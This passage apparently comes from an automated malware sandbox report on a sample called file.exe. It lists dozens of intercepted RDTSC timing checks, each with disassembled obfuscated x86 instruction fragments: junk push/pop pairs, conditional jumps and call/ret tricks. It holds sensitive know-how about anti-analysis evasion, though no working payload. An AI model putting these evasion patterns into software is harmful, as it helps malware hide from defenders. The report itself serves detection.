                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA298 second address: 7CA29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C948F second address: 7C9499 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76A4C44F4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA29E second address: 7CA308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F76A53AB96Fh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F76A53AB968h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F76A53AB978h 0x0000002e push 00000000h 0x00000030 cld 0x00000031 push 00000000h 0x00000033 mov bl, 70h 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jnl 00007F76A53AB966h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA308 second address: 7CA30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA30E second address: 7CA312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CA514 second address: 7CA527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jg 00007F76A4C44F46h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD499 second address: 7CD49F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE5A8 second address: 7CE5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD681 second address: 7CD687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD720 second address: 7CD72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F76A4C44F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD72A second address: 7CD72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0DD7 second address: 7D0DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D0DDB second address: 7D0DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4B96 second address: 7D4B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4B9A second address: 7D4BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a cld 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F76A53AB968h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D1EA5h], edi 0x0000002d push 00000000h 0x0000002f mov edi, dword ptr [ebp+122D2964h] 0x00000035 xchg eax, esi 0x00000036 jg 00007F76A53AB970h 0x0000003c push eax 0x0000003d pushad 0x0000003e jc 00007F76A53AB96Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D5CD3 second address: 7D5CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76A4C44F46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE74F second address: 7DE753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE753 second address: 7DE792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F4Ch 0x00000007 jmp 00007F76A4C44F57h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F76A4C44F55h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE792 second address: 7DE798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE8D1 second address: 7DE91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76A4C44F4Fh 0x0000000b popad 0x0000000c jmp 00007F76A4C44F4Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F76A4C44F58h 0x00000019 jmp 00007F76A4C44F4Eh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E54BA second address: 7E54CB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E54CB second address: 7E54E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C44F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E54E7 second address: 7E5506 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A53AB971h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5506 second address: 7E550A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E550A second address: 7E5514 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76A53AB966h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5669 second address: 7E569B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F76A4C44F4Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F76A4C44F59h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E569B second address: 7E56B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A53AB96Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F76A53AB966h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E56B7 second address: 7E56BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E56BB second address: 7E56CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F76A4C93C16h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5824 second address: 611A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 3AD6B824h 0x00000010 pushad 0x00000011 jnp 00007F76A540C8D9h 0x00000017 movzx eax, bx 0x0000001a and dx, 720Bh 0x0000001f popad 0x00000020 push dword ptr [ebp+122D03B5h] 0x00000026 jmp 00007F76A540C8E4h 0x0000002b call dword ptr [ebp+122D36CCh] 0x00000031 pushad 0x00000032 ja 00007F76A540C8ECh 0x00000038 xor eax, eax 0x0000003a mov dword ptr [ebp+122D23A0h], ebx 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 cld 0x00000045 mov dword ptr [ebp+122D2CC0h], eax 0x0000004b pushad 0x0000004c jmp 00007F76A540C8E2h 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1FBEh], ecx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 mov dword ptr [ebp+122D1EA0h], eax 0x00000067 jnc 00007F76A540C8E1h 0x0000006d lodsw 0x0000006f clc 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 cld 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 pushad 0x0000007a mov esi, 33349F84h 0x0000007f xor dword ptr [ebp+122D1EA0h], edx 0x00000085 popad 0x00000086 push eax 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9606 second address: 7E9622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9622 second address: 7E962D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76A540C8D6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E962D second address: 7E9656 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76A4C93C21h 0x00000008 pushad 0x00000009 jmp 00007F76A4C93C23h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E97AB second address: 7E97B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E97B1 second address: 7E97BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E97BA second address: 7E97D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jc 00007F76A540C902h 0x0000000f ja 00007F76A540C8ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E97D1 second address: 7E97EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A4C93C20h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007F76A4C93C16h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AA3 second address: 7E9AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AA7 second address: 7E9AB1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76A4C93C16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9C03 second address: 7E9C2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76A540C8D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76A540C8E1h 0x00000015 jnl 00007F76A540C8D6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9C2A second address: 7E9C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9C2E second address: 7E9C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9D82 second address: 7E9D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9D88 second address: 7E9D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F03E8 second address: 7F03F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76A4C93C16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F03F4 second address: 7F03FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F03FC second address: 7F0409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F76A4C93C22h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0409 second address: 7F041F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76A540C8D6h 0x0000000a popad 0x0000000b jng 00007F76A540C8EFh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4FB8 second address: 7F4FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4FBC second address: 7F4FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4568 second address: 7F456C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F456C second address: 7F4586 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F76A540C8E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F4586 second address: 7F4590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5265 second address: 7F5272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007F76A540C8D6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5272 second address: 7F5278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5278 second address: 7F527C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F527C second address: 7F5282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5282 second address: 7F528E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBA48 second address: 7FBA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F76A4C93C1Ch 0x0000000b pushad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA8D0 second address: 7FA8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA8D6 second address: 7FA8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA8DE second address: 7FA915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F76A540C8D6h 0x0000000a pop edx 0x0000000b jns 00007F76A540C8EEh 0x00000011 jo 00007F76A540C8E2h 0x00000017 jne 00007F76A540C8D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BA02B second address: 7BA088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 xor dword ptr [ebp+122D1EAEh], edi 0x0000000f mov ecx, dword ptr [ebp+122D2AC0h] 0x00000015 lea eax, dword ptr [ebp+1247BE47h] 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F76A4C93C18h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 jc 00007F76A4C93C1Ch 0x0000003b mov dword ptr [ebp+122D1D5Eh], edx 0x00000041 push eax 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F76A4C93C22h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BA088 second address: 7BA08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BA08C second address: 7BA09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F76A4C93C16h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BA8E4 second address: 7BA95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F76A540C8E3h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 jnl 00007F76A540C8E7h 0x00000016 xchg eax, esi 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F76A540C8D8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D17E8h] 0x00000037 mov edx, dword ptr [ebp+122D2CC8h] 0x0000003d nop 0x0000003e jmp 00007F76A540C8E1h 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB0B5 second address: 7BB107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A4C93C26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F76A4C93C18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 add ecx, dword ptr [ebp+122D392Ch] 0x0000002a push 0000001Eh 0x0000002c mov dword ptr [ebp+124466B4h], edi 0x00000032 nop 0x00000033 pushad 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB25B second address: 7BB288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76A540C8E0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F76A540C8E1h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB288 second address: 7BB28C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB28C second address: 7BB295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB295 second address: 7BB29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB446 second address: 7BB4AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76A540C8DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F76A540C8E2h 0x00000010 nop 0x00000011 add dword ptr [ebp+122D305Ah], ecx 0x00000017 lea eax, dword ptr [ebp+1247BE8Bh] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F76A540C8D8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F76A540C8E7h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEE1 second address: 7FAEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEEA second address: 7FAEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F76A540C8D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAEF4 second address: 7FAF04 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76A4C93C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAF04 second address: 7FAF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAF0A second address: 7FAF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB35F second address: 7FB363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB363 second address: 7FB39A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76A4C93C16h 0x00000008 jg 00007F76A4C93C16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F76A4C93C29h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007F76A4C93C16h 0x0000001d jnp 00007F76A4C93C16h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FFF8B second address: 7FFF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800378 second address: 8003A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a jng 00007F76A4C93C16h 0x00000010 pushad 0x00000011 popad 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F76A4C93C29h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8004E9 second address: 800506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76A540C8E0h 0x00000009 push ebx 0x0000000a je 00007F76A540C8D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8007BA second address: 8007BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
